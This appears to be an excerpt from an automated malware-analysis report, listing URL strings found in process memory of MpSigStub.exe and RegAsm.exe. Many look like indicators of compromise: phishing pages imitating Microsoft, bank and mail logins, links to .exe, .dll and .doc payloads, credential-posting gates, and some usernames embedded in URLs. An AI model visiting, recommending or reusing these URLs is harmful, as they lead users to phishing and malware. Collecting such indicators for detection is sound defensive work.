Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: https://http://bit.do/fq3bf
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://hvaclinic.com/redirect/amvhbi1mcmfuy29pcy52yxnzzxvyqgjlzmvzys5jb20=
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://hx.ns-inhince.online/?e=arnaldi
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: https://i.gyazo.com/
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: https://i.gyazo.com/7fc7a0126fd7e7c8bcb89fc52967c8ec.png
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: https://i.imgur.com/c1skhwk.png
Source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmp	String found in binary or memory: https://icam%.cl/wp%-content/%.%.%./%.%.%./x3%.php
Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	String found in binary or memory: https://ieaspk.com/instagram.dll
Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	String found in binary or memory: https://ieaspk.com/instagram.dllx
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	String found in binary or memory: https://iffusedtrac.xyz/3/bbc.exe
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: https://ikkon.pk/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: https://immobiliareneri.casa/drms/ind.html
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	String found in binary or memory: https://indygrace.com/sun/scan-img-rcsh-253018.exe
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	String found in binary or memory: https://ines-arnshoff.de/
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: https://inetaccelerator.ru/
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: https://injectsorals.com/11/i.php
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: https://injectsorals.com/oja/
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: https://institutoimepe.com.br/jl/autooffice2errors
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://integratedcombatcentre.com.au/wp-content/uploads/tmp/outlook365/outlook365/index.php
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: https://inter-pipe.ga/
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: https://internetbanking.caixa.gov.br/SIIBC/index
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://invoiceadvantagereminder.ew.r.appspot.com/index.html#ivan.tiutiunnyk
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: https://ip4.seeip.org
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: https://iplogger.com
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://iplusprima.life/wp-content/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: https://iqras.pk/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://iqras.pk/inno/inno/innoc.doc
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://irecruiter.immentia.com/storage/framework/cache/data/0e/nC7vWe43YwJjj.php
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/b2qsmx
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/eakecx
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/fnchq3
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/nr85ic
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/p1cyuo
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/qyzae1
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/x73tnb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/xwjqn2
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: https://istitutobpascalweb.it/mynotescom/renoovohostinglilnuxadvanced.php
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://itaubankline.itau.com.br/V1/PERS/IMG/bt_confirmar.gif
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/2aed6
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/9h7cn
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/cshd3
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/intdn
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/jbbhj
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/oiowg
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/vlafv
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/vyqcm
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: https://itvantaqe.com/wp/wp-admin/user/class.php
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://izmirdentalimplant.net/wp-content/themes/neve/next.php
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://j-k9.club/?e=JPohlman
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://jabaltoor.com/copy/img/blog/cat-post/r7gnor1h0.php
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	String found in binary or memory: https://jadr223.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://jammuking.xyz/wp-content/upgrabe/
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: https://jaypalsinh.ngsoftweb.eEvvmU%in/OLD_07032021/classeEvvmU%es/PHPExcel/Calculation/Token/pm4Cb7
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: https://jbg-electric.com/css/x0sjv3efx.php
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: https://jbrealestategroups.com/wp-content/themes/bridge/extendvc/msg.
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: https://jbs-stamping.square.site/
Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp	String found in binary or memory: https://jcenter.bintray.com
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	String found in binary or memory: https://jdjuwuryh.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://jiagnmehn.gq/post.php
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://jiksh.com/?referrer=
Source: MpSigStub.exe, 00000023.00000003.6317551345.0000028BD6CD2000.00000004.00000001.sdmp	String found in binary or memory: https://jira3.cerner.com/rest/api/2/issue/
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	String found in binary or memory: https://jjjkjkeh.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	String found in binary or memory: https://josematechky.com/docs/ec21_order.doc
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://jovial-pasteur.159-89-118-202.plesk.page/wp-content/uploads/index.php
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: https://jrat.io
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: https://js-cloud.com/gate.php?token=
Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	String found in binary or memory: https://juniorleadersacademy.com/reporthotmail.php
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: https://jupiternepal.com/name/stducount/php/
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: https://jusreihnt.com/dpz/?email=
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: https://kamalandcompany.com/drms/fert.html
Source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmp	String found in binary or memory: https://kelwinsales.com/ds/1702.gif
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: https://kenosis.ml/wp-content/upgrabe/
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://kiki-lo.online/?e=ckomorowski
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: https://kinzlerimmigration.com/wp_include/redirect/anvsawuuy2fydgvyqhridmmuy29t
Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	String found in binary or memory: https://kiosp.dyndns.dk/icon4/next.php
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: https://kirimliinsaat.com.tr/ui/office365
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://kiwisanagustin.com/wp-admin/includes/opo.php
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: https://kiwisanagustin.com/wp-admin/includes/opo.php%22%20method%3d%22post%22%20style%3d%22box-sizin
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: https://kod.haohaoda.cn/plugins/picasa/newpo.png
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: https://kofiruions.xyz/royal/brand.php
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: https://koirado.com/vendor/phpunit/phpunit/src/util/php/css/dir/
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://konzmny.com/?qs=a9537c1ce6614636144ad0c9e0975ac106bb986006db8f6a0789e5b0d16dcf4fc15476ba5afa
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: https://koooking.online/webs/
Source: MpSigStub.exe, 00000023.00000003.6286809278.0000028BD6A80000.00000004.00000001.sdmp	String found in binary or memory: https://kraft.eng.br/
Source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp	String found in binary or memory: https://kurtoch.eu/rgfyzrxlr/ind.html
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: https://kweraltd.com/wp-content/plugins
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://l%%8Kvfcrl%%8Kvfyptl%%8Kvfoexpert.work/core/venl%%8Kvfl%%8Kvfdor/doctrine/lexer/lib/cpf9PlDn
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: https://labrie-sabette.com/wp-includes/sodiu
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://lacoronadela11.com/wp-includes/q/?email=
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://lasvegasmanageditservices.com/oso.php
Source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp	String found in binary or memory: https://lawyersblog.net/777/picture9.dll
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: https://legalproceedings.uc.r.appspot.com/legal_proceeding_concerning_overdue_invoices_pdf.jar
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://limarija-das.hr/wp-content/plugins/wp-optimize/js/handlebars/CJrMovjhM.phpMXynE
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: https://linesburline.at/3/bbc.dll
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://linhaansi.com.br/wp-includes/maersk/index.php?email=
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: https://linkr.uk/2nuds
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: https://linkr.uk/elgja
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: https://linkr.uk/fyu5r
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: https://linkzip.me/
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: https://liquide.co/3qyyerb6gvx/ind.html
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://listoparacomer.com.ve/wp-content/hewlett-packard-mcafee/hpe.html
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: https://litesound.ml/fax/policy.php
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: https://livelongerfeelbetter.com/
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: https://livesnoop.com/client/postlog.php
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: https://livesnoop.com/client/screenshots.php
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: https://lixns.com/xl/?referrer=
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: https://lmvus.com/omar/90/$8900.doc
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: https://localmonero.co/
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/geolocate?key=test
Source: RegAsm.exe, 0000000A.00000002.7245398018.000000001E24E000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/
Source: RegAsm.exe, 0000000A.00000002.7247463310.000000001E355000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com//
Source: RegAsm.exe, 0000000A.00000002.7247463310.000000001E355000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: RegAsm.exe, 0000000A.00000002.7247463310.000000001E355000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/v104
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: https://login.livevoice365.xyz/
Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/
Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp	String found in binary or memory: https://login.yahoo.com/config/login
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: https://loginmixcrhustim0fficia6.ga/xi/policy.php
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: https://logins.daum.net/accounts/
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: https://logins.daum.net/accounts/logout.do?url=http%3A%2F%2Fwww.daum.net%2F%3Fnil_profile%3Dlogout
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: https://logowrench.website/zdz0ptxdtonla.php
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: https://logs1186.xiti.com/
Source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp	String found in binary or memory: https://logupdate.herokuapp.com
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://longurl.in/ekdnl
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://longurl.in/htyul
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://longurl.in/mccwd
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://longurl.in/tllwu
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://longurl.in/welhl
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://lupoun.com/
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: https://lupoun.com/moon/
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: https://m3lloyellow.com/rodrich.php
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://macflypro.com/builds/data/
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://maersoul.com/vix/
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: https://mail.daum.net
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: https://mail.daum.net/login?url=http%3A%2F%2Fmail.daum.net%2F
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: https://mailsending.site/Happy_CS/happyFun.exe
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: https://main.iam.ad.ext.azure.com/api/
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	String found in binary or memory: https://malsay.myftp.biz/ck/business/index.php
Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: https://mamulln.cl/kwi/?email=travis_phillips
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: https://manorrestaurantstrasburg.com/wp-zincludez/makdire/emonofhgh/wofjgjbledon/gen2021.php
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: https://marcostrombetta.com.br/ds/1802.Dc
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: https://marcostrombetta.com.br/ds/1802.gif
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: https://mareyell.org/sfexp/sfexpdbtrack/sfexss/sfexpress/source/index.php
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://massotherapielg.com/css/acrobat/login.micosoftonline.com/index.html
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: https://maxizoner.com/presentation.dll
Source: MpSigStub.exe, 00000023.00000003.6341254844.0000028BD7D97000.00000004.00000001.sdmp	String found in binary or memory: https://mazedecrypt.top/
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://md.jp-long.online/?e=robertm
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: https://md.jp-long.online/?e=vpetrillo
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	String found in binary or memory: https://md.klnmailbox.xyz/?e=
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://mdhov.ca/storage/mdhov/ca/next.php
Source: MpSigStub.exe, 00000023.00000003.6286809278.0000028BD6A80000.00000004.00000001.sdmp	String found in binary or memory: https://mdspni.com/realm/send.php
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: https://meant.usa.cc/no/sharpoin/sharpoint/share/
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: https://mediadigital.site/class-vc.php
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	String found in binary or memory: https://megoseri.com/app.dll%/cvr78f2.tmp.cvr
Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp	String found in binary or memory: https://mercados247.com/ds/1602.gif
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://message-read.iosmail-inbox.host/5c36dfff53edaf584b5d9262?qlpq7hq=&amp
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: https://meubackup.terra.com.br/index.php/s/4fwo4jtezhqnzdd/download
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	String found in binary or memory: https://mhjyutrfgf.gb.net/grte544fc3/?vfegg5355=fvvbveg545
Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmp	String found in binary or memory: https://minhafinanca.com/wp-admin/css/colors/coffee/reportexcelindeed
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: https://minisnowhair.com/minisnw2/download2.php?f=htm-2-ads19u09ue11&u=22fc8bcc-db88-4ca7-9654-81ad4
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: https://miscrsftonline.ml/blessing/policy.php
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: https://missglamourcosmeticos.com.br/ds/29.gif
Source: MpSigStub.exe, 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp	String found in binary or memory: https://mjstech1.com/06/lub.php
Source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp	String found in binary or memory: https://mmjobserver.com/aah/next.php
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: https://moegifts.com/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: https://mollahossein.ir/cgi_bin/bgxlc3rlckblyxn0bwfulmnvbq==
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: https://mor32.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: https://moralsss.com/office/office365/index.php
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://moranmus.com/adobe-vix/
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	String found in binary or memory: https://mort2021.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: https://msatechnology.com/admincp/wp-admin/css/colors/ectoplasm/reportexcel.php
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: https://mtonlino.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: https://mueblesmaple.com.mx/19.gif
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: https://muropronto.ibsweb.com.br/modules/mod_simplefileuploadv1.3/
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: https://mycrotyx.com/cgi.bin/azure2020/realm/send.php
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: https://myexternalip.com/raw
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: https://myexternalip.com/rawx
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://mylovelybluesky.com
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://myoffice365-online.com/login/common/login/mridings
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: https://myscape.in/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp	String found in binary or memory: https://mywebscrap.com/ds/0402.gif
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: https://mz.ht-aslice.online/?e=a.wirth
